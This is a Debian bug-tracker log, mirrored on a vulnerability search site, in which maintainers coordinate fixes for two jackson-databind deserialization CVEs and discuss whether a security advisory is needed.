Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2019-16942 CVE-2019-16943

Source

Debian Bug report logs - #941530
jackson-databind: CVE-2019-16942 CVE-2019-16943

Package: src:jackson-databind; Maintainer for src:jackson-databind is Debian Java Maintainers <pkg-java-maintainers@lists.alioth.debian.org>;

Reported by: Salvatore Bonaccorso <carnil@debian.org>

Date: Tue, 1 Oct 2019 20:39:01 UTC

Severity: grave

Tags: security, upstream

Found in versions jackson-databind/2.10.0-1, jackson-databind/2.8.6-1+deb9u5, jackson-databind/2.8.6-1, jackson-databind/2.9.8-3

Forwarded to https://github.com/FasterXML/jackson-databind/issues/2478

Reply or subscribe to this bug.

Toggle useless messages

View this report as an mbox folder, status mbox, maintainer mbox

Report forwarded to debian-bugs-dist@lists.debian.org, carnil@debian.org, team@security.debian.org, team@security.debian.org, Debian Java Maintainers <pkg-java-maintainers@lists.alioth.debian.org>:
Bug#941530; Package src:jackson-databind. (Tue, 01 Oct 2019 20:39:03 GMT) (full text, mbox, link).

Acknowledgement sent to Salvatore Bonaccorso <carnil@debian.org>:
New Bug report received and forwarded. Copy sent to carnil@debian.org, team@security.debian.org, team@security.debian.org, Debian Java Maintainers <pkg-java-maintainers@lists.alioth.debian.org>. (Tue, 01 Oct 2019 20:39:03 GMT) (full text, mbox, link).

Message #5 received at submit@bugs.debian.org (full text, mbox, reply):

Source: jackson-databind
Version: 2.10.0-1
Severity: grave
Tags: security upstream
Justification: user security hole
Forwarded: https://github.com/FasterXML/jackson-databind/issues/2478
Control: found -1 2.9.8-3
Control: found -1 2.8.6-1+deb9u5
Control: found -1 2.8.6-1

Hi,

Tony, Markus, As it was already expected ;-). Upstream, whilst it
affects as well 2.10.0, seemigly is not considering doing an update
for 2.10 specifically but have fixed this one as well for older
versions. Previous point, that this is just going to start to be silly
upholds.

That said, let's follow with the usual information:

The following vulnerabilities were published for jackson-databind.

CVE-2019-16942[0]:
| A Polymorphic Typing issue was discovered in FasterXML jackson-
| databind 2.0.0 through 2.9.10. When Default Typing is enabled (either
| globally or for a specific property) for an externally exposed JSON
| endpoint and the service has the commons-dbcp (1.4) jar in the
| classpath, and an attacker can find an RMI service endpoint to access,
| it is possible to make the service execute a malicious payload. This
| issue exists because of
| org.apache.commons.dbcp.datasources.SharedPoolDataSource and
| org.apache.commons.dbcp.datasources.PerUserPoolDataSource mishandling.


CVE-2019-16943[1]:
| A Polymorphic Typing issue was discovered in FasterXML jackson-
| databind 2.0.0 through 2.9.10. When Default Typing is enabled (either
| globally or for a specific property) for an externally exposed JSON
| endpoint and the service has the p6spy (3.8.6) jar in the classpath,
| and an attacker can find an RMI service endpoint to access, it is
| possible to make the service execute a malicious payload. This issue
| exists because of com.p6spy.engine.spy.P6DataSource mishandling.


If you fix the vulnerabilities please also make sure to include the
CVE (Common Vulnerabilities & Exposures) ids in your changelog entry.

For further information see:

[0] https://security-tracker.debian.org/tracker/CVE-2019-16942
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16942
[1] https://security-tracker.debian.org/tracker/CVE-2019-16943
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16943
[2] https://github.com/FasterXML/jackson-databind/issues/2478

Regards,
Salvatore

Marked as found in versions jackson-databind/2.9.8-3. Request was from Salvatore Bonaccorso <carnil@debian.org> to submit@bugs.debian.org. (Tue, 01 Oct 2019 20:39:03 GMT) (full text, mbox, link).

Marked as found in versions jackson-databind/2.8.6-1+deb9u5. Request was from Salvatore Bonaccorso <carnil@debian.org> to submit@bugs.debian.org. (Tue, 01 Oct 2019 20:39:04 GMT) (full text, mbox, link).

Marked as found in versions jackson-databind/2.8.6-1. Request was from Salvatore Bonaccorso <carnil@debian.org> to submit@bugs.debian.org. (Tue, 01 Oct 2019 20:39:05 GMT) (full text, mbox, link).

Information forwarded to debian-bugs-dist@lists.debian.org, Debian Java Maintainers <pkg-java-maintainers@lists.alioth.debian.org>:
Bug#941530; Package src:jackson-databind. (Tue, 01 Oct 2019 20:57:03 GMT) (full text, mbox, link).

Acknowledgement sent to Markus Koschany <apo@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian Java Maintainers <pkg-java-maintainers@lists.alioth.debian.org>. (Tue, 01 Oct 2019 20:57:03 GMT) (full text, mbox, link).

Message #16 received at 941530@bugs.debian.org (full text, mbox, reply):

[Message part 1 (text/plain, inline)]

Hi Salvatore,

Am 01.10.19 um 22:34 schrieb Salvatore Bonaccorso:
> Source: jackson-databind
> Version: 2.10.0-1
> Severity: grave
> Tags: security upstream
> Justification: user security hole
> Forwarded: https://github.com/FasterXML/jackson-databind/issues/2478
> Control: found -1 2.9.8-3
> Control: found -1 2.8.6-1+deb9u5
> Control: found -1 2.8.6-1
> 
> Hi,
> 
> Tony, Markus, As it was already expected ;-). Upstream, whilst it
> affects as well 2.10.0, seemigly is not considering doing an update
> for 2.10 specifically but have fixed this one as well for older
> versions. Previous point, that this is just going to start to be silly
> upholds.
> 
> That said, let's follow with the usual information:
> 
> The following vulnerabilities were published for jackson-databind.
[...]

First of all, thank you very much for taking care of reporting these issues.

Please let me know if you think this is a DSA-worthy issue. Otherwise I
will just ask the release team for an update. Personally I believe we
can treat that as an important issue from now on.

Cheers,

Markus

[signature.asc (application/pgp-signature, attachment)]

Information forwarded to debian-bugs-dist@lists.debian.org, Debian Java Maintainers <pkg-java-maintainers@lists.alioth.debian.org>:
Bug#941530; Package src:jackson-databind. (Wed, 02 Oct 2019 07:45:04 GMT) (full text, mbox, link).

Acknowledgement sent to Salvatore Bonaccorso <carnil@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian Java Maintainers <pkg-java-maintainers@lists.alioth.debian.org>. (Wed, 02 Oct 2019 07:45:04 GMT) (full text, mbox, link).

Message #21 received at 941530@bugs.debian.org (full text, mbox, reply):

Hi Markus,

On Tue, Oct 01, 2019 at 10:46:16PM +0200, Markus Koschany wrote:
> Hi Salvatore,
> 
> Am 01.10.19 um 22:34 schrieb Salvatore Bonaccorso:
> > Source: jackson-databind
> > Version: 2.10.0-1
> > Severity: grave
> > Tags: security upstream
> > Justification: user security hole
> > Forwarded: https://github.com/FasterXML/jackson-databind/issues/2478
> > Control: found -1 2.9.8-3
> > Control: found -1 2.8.6-1+deb9u5
> > Control: found -1 2.8.6-1
> > 
> > Hi,
> > 
> > Tony, Markus, As it was already expected ;-). Upstream, whilst it
> > affects as well 2.10.0, seemigly is not considering doing an update
> > for 2.10 specifically but have fixed this one as well for older
> > versions. Previous point, that this is just going to start to be silly
> > upholds.
> > 
> > That said, let's follow with the usual information:
> > 
> > The following vulnerabilities were published for jackson-databind.
> [...]
> 
> First of all, thank you very much for taking care of reporting these issues.
> 
> Please let me know if you think this is a DSA-worthy issue. Otherwise I
> will just ask the release team for an update. Personally I believe we
> can treat that as an important issue from now on.

Whilst I'm not yet sure if we should really release a futher DSA for
jackson-databind (we will come back to you on that), a possible idea
for bullseye (might be better cloned/filled as new bug, but want to
mention it here already):

https://bugzilla.redhat.com/show_bug.cgi?id=1731271

Red Hat recently had fixed a CVE for codehaus. The approach they took
there was to rather continuing on jackson-databind side (that is my
interpretation), they started a whitelist approach on the applications
side which use jackson-databind.

This might be something to consider for bullseye as well for the
reverse dependencies. Not sure if this is feasible in our case, but
this might be worth investigating.

Regards,
Salvatore

Send a report that this bug log contains spam.

Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Wed Oct 2 16:46:34 2019; Machine Name: buxtehude

Debian Bug tracking system

Debbugs is free software and licensed under the terms of the GNU Public License version 2. The current version can be obtained from https://bugs.debian.org/debbugs-source/.

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

jackson-databind: CVE-2019-16942 CVE-2019-16943

Debian Bug report logs - #941530
jackson-databind: CVE-2019-16942 CVE-2019-16943

Vulmon Search

About

Products

Connect

jackson-databind: CVE-2019-16942 CVE-2019-16943

Debian Bug report logs - #941530 jackson-databind: CVE-2019-16942 CVE-2019-16943

Vulmon Search

About

Products

Connect

Debian Bug report logs - #941530
jackson-databind: CVE-2019-16942 CVE-2019-16943